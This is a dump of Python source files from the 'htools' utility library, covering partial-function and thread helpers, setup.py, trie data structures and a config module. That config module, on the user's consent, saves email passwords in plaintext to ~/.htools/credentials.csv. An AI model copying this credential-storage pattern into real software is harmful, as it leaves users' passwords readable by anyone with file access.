        # copy_func is an htools helper; presumably returns an independent
        # copy of func so the original's dunders are left untouched — confirm
        # in this module.
        self.func = copy_func(func)
        self.old_name = func.__name__
        # Track names of positional args in old function since this affects
        # the order args must be passed in if var_positional parameters
        # (*args) are present.
        self.old_pos_pars = []
        self.kwargs_name = ''
        self.args_name = ''
        new_pars = []
        old_sig = signature(self.func)
        # inspect.Parameter kind codes used below:
        # 0=POSITIONAL_ONLY, 1=POSITIONAL_OR_KEYWORD, 2=VAR_POSITIONAL
        # (*args), 3=KEYWORD_ONLY, 4=VAR_KEYWORD (**kwargs).
        for k, v in old_sig.parameters.items():
            # Check parameter kind for error handling and argument resolution
            # in __call__.
            if v.kind == 0:
                raise NotImplementedError(
                    'rigorous_partial does not support functions with '
                    'positional only parameters.'
                )
            elif v.kind == 2:
                self.args_name = k
            elif v.kind == 4:
                self.kwargs_name = k
                # VAR_KEYWORD is always the last parameter in a signature, so
                # nothing remains to scan.
                break
            if v.kind <= 2:
                self.old_pos_pars.append(k)
            # Assign default value from newly specified kwargs if provided.
            # Params given a new default become keyword-only (kind 3).
            if k in kwargs:
                default = kwargs.pop(k)
                kind = 3
            else:
                default = v.default
                kind = v.kind
            param = Parameter(k, kind, default=default)
            new_pars.append(param)
        # Remaining kwargs only: those that were not present in func's
        # signature. Require that they be keyword only since ordering can
        # cause issues (updating signature affects what we see but doesn't
        # seem to affect the actual order args are passed in, presumably due
        # to old __code__ object).
        for k, v in kwargs.items():
            param = Parameter(k, 3, default=v)
            new_pars.append(param)
        if self.kwargs_name:
            new_pars.append(Parameter(self.kwargs_name, 4))
        # Ensure we don't accidentally place any parameters with defaults
        # ahead of those without them. Third item in tuple is a tiebreaker
        # (defaults to original function's parameter order).
        old_names = [p for p in old_sig.parameters]
        new_pars.sort(
            key=lambda x: (x.kind, x.default != _empty,
                           getindex(old_names, x.name, float('inf')))
        )
        # I honestly forget why we need to set the attribute on self.func too,
        # I just remember it was needed to resolve a bug (I think it was
        # related to *args resolution).
        self.__signature__ = self.func.__signature__ = old_sig.replace(
            parameters=new_pars
        )
        self.__defaults__ = tuple(p.default for p in new_pars if p.kind < 3
                                  and p.default != _empty)
        self.__kwdefaults__ = {p.name: p.default for p in new_pars
                               if p.kind == 3}
        if name: self.func.__name__ = name
        update_wrapper(self, self.func)
    def __call__(self, *args, **new_kwargs):
        # Remember self.func's actual code is unchanged: we updated how its
        # signature appears, but that doesn't affect the actual mechanics.
        # Therefore, we need to carefully resolve args and kwargs so that the
        # function is called so that behavior matches what we'd expect based
        # on the order shown in the signature.
        # NOTE(review): bound_args and select are htools helpers; bound_args
        # presumably resolves args+kwargs into a name->value mapping against
        # self.func's (updated) signature — confirm in this module.
        tmp_kwargs = bound_args(self.func, args,
                                {**self.__kwdefaults__, **new_kwargs})
        final_args = {name: tmp_kwargs.pop(name)
                      for name in self.old_pos_pars}
        # self.args_name is '' when func accepts no *args, so pop falls back
        # to the empty list.
        final_star_args = final_args.pop(self.args_name, [])
        final_kwargs = select(tmp_kwargs, drop=list(final_args))
        return self.func(*final_args.values(), *final_star_args,
                         **final_kwargs)
    def __repr__(self):
        """Note: the memory address here points to that of the copy of the
        source function stored in self.func.
        """
        return repr(self.func).replace(self.old_name, self.__name__)
    def __str__(self):
        return str(self.func).replace(self.old_name, self.__name__)
class OwnerAwareAttrsMixin:
    """Mixin that tries to stamp an `owner` attribute (pointing back at this
    instance) onto every value assigned to an instance attribute. Values that
    refuse the assignment (e.g. builtins like str or list) are silently left
    alone; the names of attributes that did accept an owner are tracked in
    the instance's `_owner_aware_attrs` set. E.g. after
    `trainer.model = model`, `trainer.model.owner is trainer` holds (when
    `model` supports attribute assignment) and `trainer._owner_aware_attrs`
    contains 'model'.
    """
    _aware_attrs_name = '_owner_aware_attrs'

    def __setattr__(self, key, val):
        super().__setattr__(key, val)
        # Lazily create the tracking set on the first attribute assignment.
        if not hasattr(self, self._aware_attrs_name):
            setattr(self, self._aware_attrs_name, set())
        try:
            val.owner = self
            getattr(self, self._aware_attrs_name).add(key)
        except:
            # Value doesn't support attribute assignment; skip tracking it.
            pass
class ReturningThread(Thread):
    """
    # TODO: consider creating a separate concurrency.py module? Have to
    consider dependencies, e.g. this uses meta.add_docstring, so meta.py would
    not be able to use functionality from concurrency.py.
    """
    @add_docstring(Thread)
    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs=None, *, daemon=None):
        """This is identical to a regular thread except that the join method
        returns the value returned by your target function. The
        Thread.__init__ docstring is shown below for the sake of convenience.
        """
        super().__init__(group=group, target=target, name=name,
                         args=args, kwargs=kwargs, daemon=daemon)
        # Populated by run(); stays None if no target was given or the
        # target raised.
        self.result = None

    def run(self):
        # Mirror the stock Thread.run contract: a missing target is a no-op
        # (the original crashed with `None is not callable` here), and
        # references are released in `finally` so target/args don't outlive
        # the thread's work even while the thread object itself lives on.
        try:
            if self._target is not None:
                self.result = self._target(*self._args, **self._kwargs)
        finally:
            del self._target, self._args, self._kwargs

    def join(self, timeout=None):
        """Wait for the thread to finish (up to `timeout` seconds, like
        Thread.join) and return the target function's return value.
        """
        super().join(timeout)
        return self.result
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,147 | hdmamin/htools | refs/heads/master | /htools/__init__.py | from htools.core import *
from htools.meta import *
from htools import pd_tools
from htools.structures import *
__version__ = '7.7.0'
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,148 | hdmamin/htools | refs/heads/master | /setup.py | import os
from setuptools import setup, find_packages
def requirements(path='requirements.txt'):
    """Read a pip requirements file into a list of dependency strings.

    Parameters
    ----------
    path: str
        Location of the requirements file.

    Returns
    -------
    list[str]: One item per line, with surrounding whitespace stripped.
    """
    with open(path, 'r') as f:
        return [row.strip() for row in f]
def version(path=os.path.join('htools', '__init__.py')):
    """Extract the package version from a module's `__version__` line.

    Parameters
    ----------
    path: str
        File to search; defaults to the htools package __init__.

    Returns
    -------
    str or None: The version string from the first `__version__` line, or
    None (implicitly) if no such line exists.
    """
    with open(path, 'r') as f:
        for row in f:
            if not row.startswith('__version__'):
                continue
            # Generalized: tolerate single OR double quotes plus trailing
            # whitespace (the original only stripped a newline and single
            # quotes).
            return row.split(' = ')[-1].strip().strip('\'"')
# Package build metadata. The version string and install requirements are
# read from disk at build time by the version()/requirements() helpers
# defined above in this file.
setup(
    name='htools',
    version=version(),
    description='Harrison\'s custom functions.',
    packages=find_packages(include=['htools']),
    author='Harrison Mamin',
    zip_safe=False,
    install_requires=requirements(),
    # If installing speedup causes gcc error in docker image, try
    # adding `apt install build-essentials`.
    # TODO: maybe move this dep out of extras. Fuzzywuzzy gets imported by
    # meta module so it's not really optional anymore.
    extras_require={'fuzzy': ['fuzzywuzzy'],
                    'speedup': ['fuzzywuzzy[speedup]']},
    # Exposes the `htools` console command, dispatching to htools/cli.py.
    entry_points={'console_scripts': ['htools=htools.cli:cli']}
)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,149 | hdmamin/htools | refs/heads/master | /notebooks/scratch_trie_with_attrs.py | """
Want to eventually add support for trie with word-level and maybe char-level
attributes. Ex: word embeddings, word frequencies, char->char transition probs,
parts of speech, etc.). Also experimenting with a slightly different interface
than the existing trie in htools. Note that names are the same so if you import
htools * in a notebook, things may get confusing. Might want to rename these.
"""
from htools.core import listlike
class TrieNode:
    """Single node in a Trie: outgoing edges keyed by character, terminal and
    root flags, plus arbitrary word-level attributes stored directly as
    instance attributes (their names are tracked in `kwarg_names`).
    """

    def __init__(self, edges=None, is_terminal=False, is_root=False, **kwargs):
        self.edges = edges or {}
        self.is_terminal = is_terminal
        self.is_root = is_root
        self.kwarg_names = set(kwargs)
        self.set_kwargs(**kwargs)

    def set_kwargs(self, **kwargs):
        """Attach (or overwrite) word-level attributes and record their
        names.
        """
        self.kwarg_names.update(kwargs)
        self.__dict__.update(**kwargs)

    def __contains__(self, char):
        return char in self.edges

    def __getitem__(self, char):
        return self.edges[char]

    def __setitem__(self, char, val):
        self.edges[char] = val

    def __repr__(self):
        fields = [f'edges={list(self.edges)}',
                  f'is_terminal={self.is_terminal}',
                  f'is_root={self.is_root}']
        fields.extend(f'{attr}={getattr(self, attr)}'
                      for attr in self.kwarg_names)
        return f'TrieNode({", ".join(fields)})'
class Trie:
    """Experimental prefix tree over a vocabulary of words, where each
    complete word can carry arbitrary keyword metadata (e.g. counts or
    embeddings) stored on its terminal node. Scratch code — see module
    docstring.
    """
    def __init__(self, vocab=None):
        # NOTE(review): the default vocab=None falls through to _initialize,
        # where neither the listlike branch nor the dict branches handle
        # None — `Trie()` with no args would raise. Confirm a vocab is
        # always passed.
        self.root = TrieNode(is_root=True)
        self._initialize(vocab)
    def _initialize(self, vocab):
        # Normalize `vocab` into {word: kwargs_dict} form, then add each word.
        # Case 1: vocab is list/tuple. Must assign empty kwargs.
        if listlike(vocab):
            vocab = {word: {} for word in vocab}
        # Case 2: vocab is dict but values are not dicts. Must assign default name.
        elif not isinstance(next(iter(vocab.values())), dict):
            vocab = {word: {'val': val} for word, val in vocab.items()}
        for word, kwargs in vocab.items():
            self.add(word, **kwargs)
    def add(self, word, **kwargs):
        """Insert `word` into the trie, attaching `kwargs` as metadata on
        its final (terminal) node.
        """
        # These kwargs are associated with the whole word, e.g. if you want to
        # pass in word counts or word embeddings. Still need to implement support
        # for character-level attributes if I want that (e.g. if we want some kind of
        # transition probability from 1 character to the next).
        node = self.root
        for char in word:
            if char not in node:
                node[char] = TrieNode()
            node = node[char]
        node.is_terminal = True
        node.set_kwargs(**kwargs)
    def update(self, words):
        # Bulk-add words without metadata, mirroring dict.update naming.
        for word in words:
            self.add(word)
# TODO - eventually want method that yields nodes as we add/search for a new
# word. Based on my coroutine/generator pattern. Still debugging.
def _find(self, word):
    # NOTE(review): despite the `self` parameter this appears to be used as a
    # module-level coroutine (the __main__ block calls `_find(t, 'app')`
    # unbound) — confirm intended scope before relying on it.
    node = self.root
    yield
    for char in word:
        cur = yield node
        print('1', 'cur', cur, 'node', node)
        if cur:
            # NOTE(review): TrieNode (above) defines no `.get` method, so this
            # branch would raise AttributeError if reached — consistent with
            # the "still debugging" TODO.
            node = cur.get(char)
            print('2', 'cur', cur, 'node', node)
if __name__ == '__main__':
    # Smoke test: a word -> count mapping exercises the "dict with non-dict
    # values" branch of Trie._initialize (counts get stored under 'val').
    word_dict = {
        'app': 18,
        'a': 6,
        'apple': 17,
        'about': 4,
        'able': 6,
        'zoo': 13,
        'zen': 11,
        'zesty': 14,
        'apply': 4,
        'cow': 18,
        'zigzag': 12
    }
    t = Trie(word_dict)
    # NOTE(review): still-debugging coroutine experiment (see _find's TODO).
    # `for x in coro` already advances the generator, so the extra
    # coro.send(x) call skips every other yielded value — confirm intended.
    coro = _find(t, 'app')
    print(next(coro))
    for x in coro:
        coro.send(x)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,150 | hdmamin/htools | refs/heads/master | /htools/config.py | import os
# Need to update this periodically. Could find standard library automatically
# if we add beautifulsoup dependency but html parsing logic rarely lasts long
# anyway. `data_files` argument in setup.py was not cooperating.
STD_LIB_GIST = 'https://gist.githubusercontent.com/hdmamin/' \
               '5c766f9cbfb9e98a151e57086cf3ee36/raw/' \
               '3955ab460f50be18e86846c4dd380b19947042f5/standard_library.json'
# Per-user directory holding htools config and credential files.
CONFIG_DIR = os.path.expanduser(os.path.join('~', '.htools'))
# Holds "email,password" lines written by get_credentials.
CREDS_FILE = os.path.join(CONFIG_DIR, 'credentials.csv')
# Holds the single default email address written by get_default_user.
CONFIG_FILE = os.path.join(CONFIG_DIR, 'config.csv')
def get_default_user():
    """Load the user's default email address from the config file. If no
    default has been saved yet, interactively offer to create one.

    Returns
    --------
    str or None: The default email address. If the user declines to specify
    one, None is returned.
    """
    os.makedirs(CONFIG_DIR, exist_ok=True)
    # EAFP: a missing config file means no default has been set yet.
    try:
        with open(CONFIG_FILE, 'r') as f:
            return f.read().strip()
    except FileNotFoundError:
        pass
    cmd = input('No source email was specified and no default exists. '
                'Would you like to add a default? [y/n]\n')
    if cmd != 'y':
        print('Exiting (no email specified).')
        return None
    email = input('Enter default email address:\n')
    with open(CONFIG_FILE, 'w') as f:
        f.write(email)
    return email
def get_credentials(from_email):
    """Look up the stored password for an email address, interactively
    prompting the user to enter (and optionally save) one if no stored
    credentials are found.

    Parameters
    ----------
    from_email: str
        The email address to get the password for.

    Returns
    -------
    str or None: The password for `from_email` if one is found or entered,
    otherwise None.
    """
    os.makedirs(CONFIG_DIR, exist_ok=True)
    # Broad except is deliberate: a missing creds file, a malformed line, or
    # an absent email all fall through to the manual-entry prompt below.
    try:
        with open(CREDS_FILE, 'r') as f:
            creds = dict([line.strip().split(',') for line in f])
        return creds[from_email]
    except Exception:
        pass
    cmd = input('We could not find credentials for that email '
                'address. Would you like to enter your credentials '
                'manually? [y/n]\n')
    if cmd != 'y':
        print('Exiting (no credentials given).')
        return None
    # User enters password manually; optionally persist it for next time.
    password = input('Enter password:\n')
    cmd2 = input('Would you like to save these credentials locally '
                 '(if so, htools will remember your password next '
                 'time)? [y/n]\n')
    if cmd2 == 'y':
        with open(CREDS_FILE, 'a') as f:
            f.write(f'{from_email},{password}\n')
        print(f'File saved to {CREDS_FILE}.')
    return password
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,151 | hdmamin/htools | refs/heads/master | /htools/structures.py | from collections import namedtuple, OrderedDict, Iterable
from copy import deepcopy
from datasketch import MinHash, MinHashLSHForest
from functools import partial
from fuzzywuzzy import fuzz, process
from heapq import heappop, heappush
from multipledispatch import dispatch
from numbers import Integral
import numpy as np
from tqdm.auto import tqdm
import warnings
from htools.core import ngrams, tolist, identity, func_name, listlike, select,\
parallelize
from htools.meta import add_docstring
def Args(**kwargs):
    """Build a namedtuple of arguments on the fly.

    Useful when a function returns multiple values: compared to a plain
    tuple we get dot-notation access by name, and compared to a dict we
    keep a lightweight, immutable container. Creating the namedtuple type
    here means callers can construct one as easily as a dict literal,
    without declaring a new type per function.

    Parameters
    ----------
    kwargs: any
        Field names mapped to their values.

    Returns
    -------
    namedtuple: An instance of a namedtuple type named "Args" whose fields
    are the keyword names, in the order they were passed.

    Examples
    --------
    def math_summary(x, y):
        return Args(sum=x + y,
                    product=x * y,
                    difference=x - y,
                    quotient=x / y)

    >>> results = math_summary(4, 2)
    >>> results.product
    8
    >>> results.quotient
    2
    >>> results
    Args(sum=6, product=8, difference=2, quotient=2)
    """
    fields = list(kwargs)
    return namedtuple('Args', fields)(**kwargs)
class TrieNode:
    """Single node in a Trie. Most of the functionality lives in the Trie
    class; a node just tracks its outgoing edges, depth, and whether a
    stored sequence terminates here.
    """

    def __init__(self, data=(), depth=0):
        """
        Parameters
        ----------
        data: Iterable or Iterable[Iterable]
            One or more sequences to add to the node (e.g. a string, a list
            of strings, or a list of tuples of ints).
        depth: int
            Distance of this node from the root.
        """
        self.edges = {}
        self.stop_state = False
        self.depth = depth
        for seq in tolist(data):
            self.append(seq)

    def append(self, seq):
        # Walk the sequence item by item, creating child nodes as needed,
        # then mark the final node as a valid stopping point. (Iterative
        # equivalent of consuming seq[0] and recursing on seq[1:].)
        node = self
        for item in seq:
            if item not in node.edges:
                node.edges[item] = TrieNode(depth=node.depth + 1)
            node = node.edges[item]
        node.stop_state = True

    def __repr__(self):
        return f'{type(self).__name__}({list(self.edges.keys()) or ""})'
class Trie:
    """Memory-efficient data structure for highly duplicated sequence data. For
    example, this would be a nice way to store a dictionary since many words
    overlap (e.g. can, cannot, cannery, canning, cane, and cannon all share the
    first 3 letters. With Trie, the common prefix is stored only once.).
    Checking if a sequence is present is therefore O(n) where n is the length
    of the input sequence. Notice this is unaffected by the number of values in
    the Trie.
    """
    def __init__(self, values=(), suffix=False, node_cls=TrieNode):
        """
        Parameters
        ----------
        values: str or list-like Iterable
            If provided, this should be one or more sequences to add to the
            try. Sequences could be strings, lists of strings (like word
            tokens), tuples of integers, etc. As of Dec 2020, this should NOT
            be numpy arrays or torch tensors.
        suffix: bool
            If True, sequences are stored reversed, making this a suffix
            tree (optimized for `endswith`/`longest_common_suffix`).
        node_cls: type
            Node class to use internally; must match TrieNode's interface.
        """
        self.node_cls = node_cls
        self.head = node_cls()
        # Suffix trees store sequences reversed; _maybe_reverse performs the
        # reversal on the way in AND restores original order on the way out.
        if suffix:
            self._maybe_reverse = lambda x: x[::-1]
        else:
            self._maybe_reverse = identity
        self.suffix = suffix
        # dtype records the type of object present in the trie, and is a
        # string rather than a type because lolviz library has a
        # bug when displaying type attributes. Its visualizations are very
        # helpful here so I don't want to break compatibility.
        self.dtype = ''
        self.child_dtype = ''
        self.postprocess = None
        # Use extend rather than passing values directly to TrieNode because
        # that won't give us validation or preprocessing.
        self._length = 0
        self.extend(tolist(values))
    def append(self, seq):
        """Add a sequence to the trie. This operates in place."""
        # First append: record dtypes and pick the postprocessor ("".join
        # for strings, identity otherwise). Later appends: validate types.
        if not self.postprocess:
            self.dtype = type(seq).__name__
            self.child_dtype = type(seq[0]).__name__
            self.postprocess = partial(str.join, '') if self.dtype == 'str' \
                else identity
        else:
            self._validate_input(seq)
        self.head.append(self._maybe_reverse(seq))
        # NOTE(review): _length is incremented unconditionally, so appending
        # a sequence that's already present makes len(trie) disagree with
        # len(trie.values()) — confirm whether duplicates should count.
        self._length += 1
    def extend(self, seqs):
        """Add a list-like group of sequences to the Trie."""
        for seq in seqs:
            self.append(seq)
    def __add__(self, seq):
        """Allows us to add items to a trie using + operator. This does not
        alter the trie in place: to do that, use `append` or assign the result
        of this method back to your variable.

        Returns
        -------
        Trie
        """
        clone = deepcopy(self)
        clone.append(seq)
        return clone
    def _find(self, seq, node=None):
        """Try to find a sequence in the trie. We provide this helper method
        rather than doing it entirely in __contains__ in case other methods
        want to make use of the found node (perhaps passing it to
        self._values.)

        Returns
        -------
        TrieNode: If node.stop_state=True, the seq is in the trie. If False,
        it's not.
        """
        self._validate_input(seq)
        seq = self._maybe_reverse(seq)
        node = node or self.head
        for x in seq:
            if x not in node.edges:
                # Return this so __contains__ can check its stop state.
                return self.node_cls()
            node = node.edges[x]
        return node
    def __contains__(self, seq):
        """Check if a sequence is present in the trie.

        Returns
        -------
        bool
        """
        return self._find(seq).stop_state
    def _values(self, current=None, node=None):
        """Generator that yields each sequence in the tree one by one. Don't
        rely on the order, but I believe it should be a depth first traversal
        where the order of subtries traversed is determined by insertion
        order. See examples.

        Parameters
        ----------
        current: list or None
            List of partial sequence currently being retrieved. This is used
            internally but should rarely need to be called by the user.
        node: TrieNode or None
            The node to retrieve values from. By default, we use the root
            node, thereby retrieving values for the whole trie.

        Examples
        --------
        >>> t = Trie(['add', 'subtract', 'addition', 'multiply', 'adds'])
        >>> for v in t._values():
                print(v)
        add
        addition
        adds
        subtract
        multiply
        """
        node = node or self.head
        current = current or []
        if node.stop_state:
            # Here, reversal is more of a postprocessing step than a
            # preprocessing one: we're converting the reversed word stored in
            # the suffix tree back to its original order.
            yield self._maybe_reverse(self.postprocess(current))
        for key, node_ in node.edges.items():
            yield from self._values(current + [key], node_)
    def __iter__(self):
        """We separate this from self._values because we want the latter to
        be callable with arguments.
        """
        yield from self._values()
    def values(self):
        """Get a list of all sequences in the trie. User-facing version of
        `_values` that returns a list rather than a generator. User can also
        simply call `list(my_trie)` and get the same result.
        """
        return list(self)
    def __len__(self):
        # Don't just delegate to `self.values()` because __len__ is called
        # under the hood by list(self), thereby creating a recursion error in
        # `self.values()`. Could do `sum(1 for _ in self) but that gets slow
        # with large tries. There's currently no way to delete items so we
        # don't have to worry about length changing outside of `append`, and
        # if we do implement that we can simply adjust _length accordingly.
        return self._length
    def _startswith(self, seq, node=None):
        """Base behavior for both `startswith` and `endswith`.
        """
        # Validation occurs in `_find`.
        node = self._find(seq, node=node)
        # Reattach the query to each stored continuation on the correct side.
        if self.suffix:
            return [x + seq for x in self._values(node=node)]
        else:
            return [seq + x for x in self._values(node=node)]
    def startswith(self, seq, node=None):
        """Gets all values in a trie that start with a given sequence. (Unlike
        str.startswith, this does NOT return a boolean - consider renaming in
        a future version.)

        Parameters
        ----------
        seq: Iterable
            Same type as all the other sequences in the trie.
        node: TrieNode
            If provided, only the subtrie starting with this node will be
            searched. Defaults to the head, i.e. the whole trie will be
            searched.

        Returns
        -------
        list: Each item will be one of the sequences in the trie. If an empty
        list is returned, the trie contains no items sharing any leading
        values with the input `seq`.
        """
        # Suffix trees can't walk prefixes directly: fall back to a full
        # traversal with per-value filtering.
        if self.suffix:
            warnings.warn(
                'Suffix trees are optimized for the `endswith` method, but '
                '`startswith` will require walking the whole trie (may be '
                'slow). For an efficient implementation of `startswith`, you '
                'can create a prefix tree by passing `suffix=False` to '
                'Trie.__init__.'
            )
            if self.dtype == 'str':
                return [v for v in self._values(node=node)
                        if v.startswith(seq)]
            else:
                self._validate_input(seq)
                length = len(seq)
                return [v for v in self._values(node=node)
                        if v[:length] == seq]
        return self._startswith(seq, node=node)
    def endswith(self, seq, node=None):
        """Gets all values in a trie that end with a given sequence. (Unlike
        str.endswith, this does NOT return a boolean - consider renaming in
        a future version.)

        Parameters
        ----------
        seq: Iterable
            Same type as all the other sequences in the trie.
        node: TrieNode
            If provided, only the subtrie starting with this node will be
            searched. Defaults to the head, i.e. the whole trie will be
            searched.

        Returns
        -------
        list: Each item will be one of the sequences in the trie. If an empty
        list is returned, the trie contains no items sharing any trailing
        values with the input `seq`.
        """
        # Prefix trees can't walk suffixes directly: fall back to a full
        # traversal with per-value filtering.
        if not self.suffix:
            warnings.warn(
                'Prefix trees are optimized for the `startswith` method, but '
                '`endswith` will require walking the whole trie (may be '
                'slow). For an efficient implementation of `endswith`, you '
                'can create a suffix tree by passing `suffix=True` to '
                'Trie.__init__.'
            )
            if self.dtype == 'str':
                return [v for v in self._values(node=node)
                        if v.endswith(seq)]
            else:
                self._validate_input(seq)
                length = len(seq)
                return [v for v in self._values(node=node)
                        if v[-length:] == seq]
        return self._startswith(seq, node=node)
    def _longest_common_prefix(self, seq, seen):
        """Base functionality for the efficient version of
        `longest_common_prefix` for prefix trees and `longest_common_suffix`
        for suffix trees.

        Parameters
        ----------
        seq: Iterable
            Input sequence for which you wish to find sequences with matching
            prefixes (or suffixes). Type must match that of the other
            sequences in the trie.
        seen: list
            Empty list passed in. Seems to be necessary to accumulate matches.

        Returns
        -------
        list: Each item in the list is of the same type as `seq`. An empty
        list means no items in the tree share a common prefix with `seq`.
        """
        # Validation and reversal happens in `startswith`.
        matches = self.endswith(seq) if self.suffix else self.startswith(seq)
        if matches: return matches
        node = self.head
        for i, x in enumerate(self._maybe_reverse(seq)):
            if x in node.edges:
                seen.append(x)
                node = node.edges[x]
            elif i == 0:
                # Otherwise, all values are returned when the first item is
                # not in the trie.
                return []
            else:
                seen = self._maybe_reverse(self.postprocess(seen))
                if self.suffix:
                    matches = [v + seen for v in self._values(node=node)]
                else:
                    matches = [seen + v for v in self._values(node=node)]
                # Otherwise, we get bug where an empty list is returned if
                # the longest matching prefix is a complete sequence and the
                # node has no edges.
                if node.stop_state and not matches:
                    matches.append(seen)
                return matches
        # Case where the input sequence is present in the trie as a complete
        # sequence and it has no edges. This cannot be combined with the
        # case in the else statement above where matches is empty. We avoid
        # handling this upfront with something like
        # `if seq in self: return [seq]` because we want to capture additional
        # valid sequences in present.
        if node.stop_state:
            return [self._maybe_reverse(self.postprocess(seen))]
    def longest_common_prefix(self, seq):
        """Find sequences that share a common prefix with an input sequence.
        For instance, "carry" shares a common prefix of length 3 with "car",
        "carton", and "carsick", a common prefix of length 1 with "chat", and
        no common prefix with "dog". Note that a word shares a common prefix
        with itself, so if it's present in the trie it will be returned (in
        addition to any words that begin with that substring: for instance,
        both "carry" and "carrying" share a common prefix of length 5 with
        "carry".)

        Parameters
        ----------
        seq: Iterable
            Input sequence for which you wish to find sequences with matching
            prefixes. Type must match that of the other
            sequences in the trie.

        Returns
        -------
        list: Each item in the list is of the same type as `seq`. An empty
        list means no items in the tree share a common prefix with `seq`.
        """
        # Validation occurs in self.startswith, often via self._find.
        if not self.suffix:
            return self._longest_common_prefix(seq, [])
        warnings.warn(
            'Suffix trees are optimized for the `longest_common_suffix` '
            'method, but `longest_common_prefix` will require walking '
            'the whole trie (may be slow). For an efficient implementation '
            'of `longest_common_prefix`, you can create a prefix tree by '
            'passing `suffix=False` to Trie.__init__.'
        )
        self._validate_input(seq)
        # Brute force: try successively shorter prefixes until something
        # in the trie matches.
        res = []
        for i in range(len(seq), 0, -1):
            for v in self._values():
                if v[:i] == seq[:i]: res.append(v)
            if res: break
        return res
    def longest_common_suffix(self, seq):
        """Find sequences that share a common suffix with an input sequence.
        For instance, "carry" shares a common prefix of length 2 with "story",
        "tawdry", and "ornery", a common suffix of length 1 with "slowly", and
        no common suffix with "hate". Note that a word shares a common suffix
        with itself, so if it's present in the trie it will be returned (in
        addition to any words that end with that substring: for instance, both
        "carry" and "miscarry" share a common suffix of length 5 with
        "carry".)

        Parameters
        ----------
        seq: Iterable
            Input sequence for which you wish to find sequences with matching
            suffixes. Type must match that of the other sequences in the trie.

        Returns
        -------
        list: Each item in the list is of the same type as `seq`. An empty
        list means no items in the tree share a common prefix with `seq`.
        """
        # Validation and reversal occur in self.endswith, often via
        # self._find.
        if self.suffix:
            return self._longest_common_prefix(seq, [])
        warnings.warn(
            'Prefix trees are optimized for the `longest_common_prefix` '
            'method, but `longest_common_suffix` will require walking the '
            'whole trie (may be slow and memory intensive). For an '
            'efficient implementation of `longest_common_suffix`, you can '
            'create a suffix tree by passing `suffix=True` to Trie.__init__.'
        )
        self._validate_input(seq)
        # Brute force: try successively shorter suffixes until something
        # in the trie matches.
        res = []
        for i in range(len(seq), 0, -1):
            for v in self._values():
                if v[-i:] == seq[-i:]: res.append(v)
            if res: break
        return res
    def _validate_input(self, seq):
        """This should occur before calling self._maybe_reverse. Seq must be
        the same type as the other items in the trie or an error will be
        raised.
        """
        if type(seq).__name__ != self.dtype:
            raise TypeError('`seq` type doesn\'t match type of other '
                            'sequences.')
        if type(seq[0]).__name__ != self.child_dtype:
            raise TypeError('Type of first item in `seq` doesn\'t match type '
                            'of first item in other sequences.')
    def flip(self):
        """Flip trie from a prefix tree to a suffix tree or vice versa. This
        intentionally creates a new object rather than operating in place.

        Examples
        --------
        >>> pre_tree = Trie(['dog', 'cat', 'den', 'clean'], suffix=False)
        >>> suff_tree = pre_tree.flip()
        """
        return type(self)(self.values(), suffix=not self.suffix)
    def __repr__(self):
        # Display up to 5 values in repr.
        vals = self.values()
        if len(vals) > 5:
            vals = '[' + ', '.join(repr(v) for v in vals[:5]) + ', ...]'
        else:
            vals = str(vals)
        return f'{type(self).__name__}(values={vals}, suffix={self.suffix})'
class _FuzzyDictBase(dict):
"""Abstract base class for fuzzy key dictionaries.
Subclasses must define a method `similar` (see FuzzyKeyDict and LSHDict for
examples. See `__init_subclass__` for explanation of why we don't define
an abstractmethod here.
"""
def __getitem__(self, key):
try:
return super().__getitem__(key)
except KeyError:
return self.similar(key, mode='values', n_keys=1)[0]
def __init_subclass__(cls, **kwargs):
"""Can't use abstractmethod decorator because we're inheriting from
dict whose metaclass is not ABCMeta. Enforce this manually instead.
"""
super().__init_subclass__(**kwargs)
# Don't use inspect.ismethod because functions haven't been bound yet.
# Not perfect but good enough for this use case.
